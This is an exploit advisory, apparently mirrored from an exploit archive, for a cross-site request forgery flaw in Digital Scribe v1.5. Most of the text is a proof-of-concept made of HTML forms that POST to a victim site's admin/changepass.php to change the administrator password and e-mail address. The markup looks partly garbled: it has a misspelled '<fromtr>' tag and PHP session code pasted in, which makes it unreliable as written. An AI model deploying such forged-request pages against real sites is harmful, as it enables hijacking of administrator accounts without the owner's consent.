Digital Scribe v1.5 CSRF Vulnerability

Digital Scribe v1.5 CSRF Vulnerability
 
Author : Muhammet Cagri Tepebasili
 
Date : 11.11.2011
 
Script Homepage and Download : http://www.digital-scribe.org/
 
Version : 1.5
 
Tested on : Linux Mint 11
 
Exploit :
 
 
<fromtr>
<P>
<table border=1><tr><td>
<FORM METHOD=POST ACTION=[victim]/admin/
changepass.php>
<BR>New Password: <INPUT TYPE=TEXT NAME=pass>
<INPUT TYPE=HIDDEN NAME=ID VALUE=<?php echo "$_SESSION[secure_id]"; ?>>
<BR><INPUT TYPE=submit NAME=submit VALUE="Update">
</form></td></tr></table>
 
 
<P>
<table border=1><tr><td>
<FORM METHOD=POST ACTION=[victim]/admin/changepass.php>
<BR>New E-mail: <INPUT TYPE=TEXT NAME=emailad VALUE=<?php echo "$emailad";
?>>
<INPUT TYPE=HIDDEN NAME=ID VALUE=<?php echo "$_SESSION[secure_id]"; ?>>
<BR><INPUT TYPE=submit NAME=chng_email VALUE="Update">
</form></td></tr></table>
</fromtr>
 
Greetz : Eymen Sen and Cafer K.Sezer



#  0day.today [2018-02-09]  #